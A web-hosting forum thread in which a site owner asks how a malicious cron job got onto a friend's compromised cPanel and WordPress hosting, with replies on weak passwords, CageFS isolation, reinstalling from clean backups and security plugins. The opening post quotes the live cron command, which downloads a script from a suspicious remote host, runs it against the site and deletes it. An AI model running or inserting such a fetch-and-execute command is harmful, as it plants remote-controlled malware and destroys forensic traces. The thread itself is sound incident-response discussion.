Infected WP and maybe cPanel as well
bikegremlin
ModeratorOGContent Writer
in Technical
As usual, no one cares until the excrement hits the air-current amplifier.
All bad:
- Unreliable provider - check
- Several sites on one cPanel - check
- WordPress without updates and any hardening - check
And yes, it's a friend I can't say no to.
Now, my first (and only so far) question is:
Can this cron job be added to cPanel through WordPress, or does it mean the whole cPanel account has been compromised (if that can be answered just from this info)?
wget -q -O xxxd http:// hello. hellodolly666. xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home/corleoneaccount/public_html/corleone_site 24 && rm -f xxxd
Relja of House Novović, the First of His Name, King of the Plains, the Breaker of Chains, WirMach Wolves pack member
BikeGremlin's web-hosting reviews
Comments
Just to clarify, your question is if the command above can be added to an account's crontab via a compromised WordPress installation?
In theory, yes - but that would mean that WordPress, more accurately that the cPanel account's user and PHP, had enough privileges to modify the user's crontab. If that were the case, it would be safe to assume that the server is wholly misconfigured and not hardened in the slightest.
More often than not a weak password is used and the cPanel account was probably compromised.
Hope you get it sorted!
That makes sense - thank you.
Most probably it was the cPanel password.
But will know with more certainty over the next few days/weeks.
Relja of House Novović, the First of His Name, King of the Plains, the Breaker of Chains, WirMach Wolves pack member
BikeGremlin's web-hosting reviews
Everything about this screams "Just do a full re-install at start from scratch"!
First of all the domain name. Looks sketchy AF.
Then automating downloading of a script and running it on a regular basis with no oversight of what the script is doing. Big red flag.
Deleting the script afterwards leaves no forensic evidence of what the script even was doing.
Just remember, if you schedule a job like this, even the one time you look at the script and check it's benign, doesn't mean they don't switch in a malicious script just once (and also they can tell from their logs exactly when your cronjob runs) and then return the innocent looking script for all other fetches.
I was suggesting a completely new cPanel account (with a different hosting provider) - and a separate one for each website, just in case. Cloudflare DNS to make any migrations faster and smoother (+ extra security and the basic CDN & speed benefits). Plus a general re-work of the WordPress sites. Oh - and using the last clean backup, even though it's quite old.
However, people aren't always reasonable.
Guess that's a big part of being human.
I decided to help a friend in trouble, in spite of them acting stupid.
Took a lot of time. Looks good for now.
We'll all laugh when it backfires.
Relja of House Novović, the First of His Name, King of the Plains, the Breaker of Chains, WirMach Wolves pack member
BikeGremlin's web-hosting reviews
I'd also opt for a fresh start (hosting+install). Maybe also install WP Security Ninja to initially harden wp install or even scan wit premium free trial.
Ympker's VPN LTD Comparison, Uptime.is, Ympker's GitHub.
Most if not all Cpanel host will be using CloudLinux with Cagefs enabled, so each user will be isolated from each other,I believe with it enabled the user cronjob are stored at ~/.cagefs/var/spool/cron that directory is within user home dir.
Can WordPress edit the user cronjob it all depends on the file permissions if it actually writeable by the user I don't use cpanel so don't know if it is user writeable then Wordpress probably can as well since PHP will be running as user.
For now:
No LiteSpeed, no CloudLinux and no (not that I know of) antivirus with the current hosting provider.
And website migration, for now, is out of the question.
But as far as I know and can tell, they don't allow PHP to make any serious problems.
Budget, but not too bad hosting.
One of those times when I stand back and LOL at myself.
It will be fine.
Relja of House Novović, the First of His Name, King of the Plains, the Breaker of Chains, WirMach Wolves pack member
BikeGremlin's web-hosting reviews
If your friend isn't tech-savvy and you don't want to manage things for them, I'd suggest moving to a managed WordPress host, where they handle updates and security for you. WPEngine is best but expensive, SiteGround is decent and fairly cheap, and there's a bunch of others.
Then any issues become the provider's problem, not yours
Daniel15 | https://d.sb/. List of all my VPSes: https://d.sb/servers
dnstools.ws - DNS lookups, pings, and traceroutes from 30 locations worldwide.
How many posts/pages are we talking about?
What about any custom templates?
Comments or any other data?
What plugins and theme does your friends site have? Which version of php and wp? *
Possible solution sent via PM. If others interested, happy to send them as well. Cheers
Best wishes
blog | exploring visually |
Daniel San,
You are well aware, siteground or not, our man will still be responsible. Especially if the friend is a .. ahem.. “friend”.
blog | exploring visually |
Tell them that you're fixing it, then just open a support ticket and let the host do all the work
Daniel15 | https://d.sb/. List of all my VPSes: https://d.sb/servers
dnstools.ws - DNS lookups, pings, and traceroutes from 30 locations worldwide.
Working hard versus working smart by delegate/ outsourcing.
That’s why they pay you the big bucks !!
p.s: Goodbye “Sonny”
blog | exploring visually |
Do you use WP Security Ninja? is it better than WordFence?
With due respects to plugins
Relying on basics steps and some common sense is a far superior and sustainable security approach compared to using plugins
Unfortunately leads to reliance on plugins .
I do use wp security ninja pro version
But wp is a sum of moving parts
Server
Php
Database
Wp core
Theme
Plugins
Extensions
External embeds
No plugins ensure foolproof
blog | exploring visually |
I use wp security ninja for initial setup. For that, it's useful. They stopped selling lifetimes iirc but @vyas might have still gotten one I don't use Wordfence or Security Ninja after.
Ympker's VPN LTD Comparison, Uptime.is, Ympker's GitHub.
No, it is a friend, not a "friend."
Thanks to everyone for the help and advice.
Yes, a files & DB wipe and a fresh WP install; and some downtime, while the files and data are imported, were necessary.
Should have done that right away, but it took a day for everyone involved to make peace with the fact it's fucked and come to their senses.
Did some basic WP "hardening" - but the provider change (and the whole basic infrastructure re-work) is still out of the question... for now.
(For) now, I'm an optimist - for a change.
Relja of House Novović, the First of His Name, King of the Plains, the Breaker of Chains, WirMach Wolves pack member
BikeGremlin's web-hosting reviews